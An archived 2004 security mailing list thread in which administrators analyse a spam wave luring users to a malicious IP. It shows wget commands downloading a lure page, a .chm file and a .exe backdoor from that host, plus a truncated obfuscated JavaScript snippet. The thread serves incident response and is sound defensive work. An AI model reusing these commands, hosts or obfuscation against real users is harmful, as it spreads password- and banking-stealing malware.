Re: Massive increase in spam volume?

From: Don Wilder (don_at_thewilders.org)
Date: 04/26/04

    To: "Jay D. Dyson" <jdyson@treachery.net>, Incidents List <incidents@securityfocus.com>
    Date: Mon, 26 Apr 2004 10:33:22 -0400

    This is actually an exploit and was discussed last week on
    the Dshield email list. I am copying the findings here for
    your information.

    -Don
    ---------- cut from Dshield ------------------
    From: "Blanchard, Joe" <BLANCHAJ@bsci.com>
    Sender: <list-bounces@lists.dshield.org>
    Subject: RE: [Dshield] Osama email
    Date: Fri, 23 Apr 2004 14:05:26 -0400
    To: "'General DShield Discussion List'" <list@lists.dshield.org>

    Not sure this is the same as noted on this article.
    I'm seeing the following when hitting that link:

    The HTML off of /pics attempts to DL pics.chm, which in turn (I
    believe) DLs and runs pics.exe.
    Oddly, while I've not enough time to fully investigate this, it
    overwrites my wmplayer.exe, resulting in a change in size to 11k from 72k.
    Variant maybe?

    Cheers
    -Joe

    Following are wgets of the item(s):
    [root@ jgb]# wget http://220.95.231.54/pics
    --13:59:16-- http://220.95.231.54/pics
                => `pics'
    Connecting to 220.95.231.54:80... connected.
    HTTP request sent, awaiting response... 302 Object Moved
    Location: http://220.95.231.54/pics/ [following]
    --13:59:17-- http://220.95.231.54/pics/
                => `index.html'
    Connecting to 220.95.231.54:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 4,113 [text/html]

    100%[====================================>] 4,113 17.54K/s ETA 00:00

    13:59:17 (17.54 KB/s) - `index.html' saved [4113/4113]

    [root@ jgb]# more index.html
    <script>
    <!--
    function S(){var s=location.href.substr(7);return s.substr(0,s.indexOf('/'));}
    function T(){return 'l';}
    function U(){return 'C';}
    function V(){return 'm';}
    function W(){return '.';}
    function X(){return 'E';}
    function Y(){return 'i';}
    function Z(){return 'x';}
    document.write(unescape("%3"+U()+"HTML%3"+X()+"%3"+U()+"H"+X()+"AD%3"+X()+"%3"+U()+"TITL"+X()+"%3"+X()+"where%20to%20buy%20v"+Y()+"agra%3"+U()+"/TITL"+X()+"%3"+
    ==========intentional left out full source
    [root@jgb]# wget http://220.95.231.54/pics.chm
    --14:00:56-- http://220.95.231.54/pics.chm
                => `pics.chm'
    Connecting to 220.95.231.54:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 11,268 [application/octet-stream]

    100%[====================================>] 11,268 23.72K/s ETA 00:00

    14:00:57 (23.72 KB/s) - `pics.chm' saved [11268/11268]
    [root@jgb]# wget http://220.95.231.54/pics.exe
    --14:03:11-- http://220.95.231.54/pics.exe
                => `pics.exe'
    Connecting to 220.95.231.54:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 10,752 [application/octet-stream]

    100%[====================================>] 10,752 21.65K/s ETA 00:00

    14:03:12 (21.65 KB/s) - `pics.exe' saved [10752/10752]

    > ----------
    > From: list-bounces@lists.dshield.org [SMTP:list-bounces@lists.dshield.org]
    > on behalf of Deb Hale [SMTP:haled@pionet.net]
    > Sent: Friday, April 23, 2004 12:40 PM
    > To: 'General DShield Discussion List'
    > Subject: [Dshield] Osama email
    >
    > FYI,
    >
    > I just received notification from my AV that the file that Bjorn Stromberg
    > emailed had the Exploit-MhtRedir.gen virus. It appears that is what they
    > are calling this particular email. Symantec calls it Backdoor.Nibu.D and
    > says that it attempts to steal passwords and bank account information.
    >
    > http://securityresponse.symantec.com/avcenter/venc/data/backdoor.nibu.d.html
    >
    > Deb
    >

    On Sun, 25 Apr 2004 23:00:05 -0700 (PDT)
      "Jay D. Dyson" <jdyson@treachery.net> wrote:
    >On Sat, 24 Apr 2004, Thamer Al-Harbash wrote:
    >
    >> I work at a large ISP in Canada and just a few hours ago we've
    >> experienced a massive increase in spam volume. The volume is so high
    >> it's bordering on being a denial of service attack.
    >>
    >> Does anyone know if there's a worm out in the wild currently doing this?
    >> I've confirmed with some of my colleagues that other ISPs are also
    >> experiencing this.
    >>
    >> I'm interested in finding specific netblocks but the spam seems to be
    >> coming from everywhere.
    >
    > I'd say you're seeing the first wave of what appears to be a new
    >worm. Earlier this evening I received about 20 copies of the same message
    >(same subject, same body, different senders) which was titled, "Osama bin
    >Laden found!" and listed a URL (http://220.95.231.54/pics/).
    >
    > Being naturally curious (and even more naturally paranoid), I went
    >to the URL...but not with my browser. What I snagged was an obfuscated
    >Javascript page which -- from what I could decipher at a glance -- was
    >some kind of spam pitch for cheap prescription drugs. I didn't bother
    >looking for a malicious payload after that.
    >
    > So what we have here could be a worm that spews spam. This sort
    >of thing will pretty much render the idea of blackholing netblocks useless
    >now, since unpatched Windows systems are everywhere.
    >
    > That's my take. I look forward to hearing about what others have
    >seen land in their inboxes.
    >
    >-Jay
    >

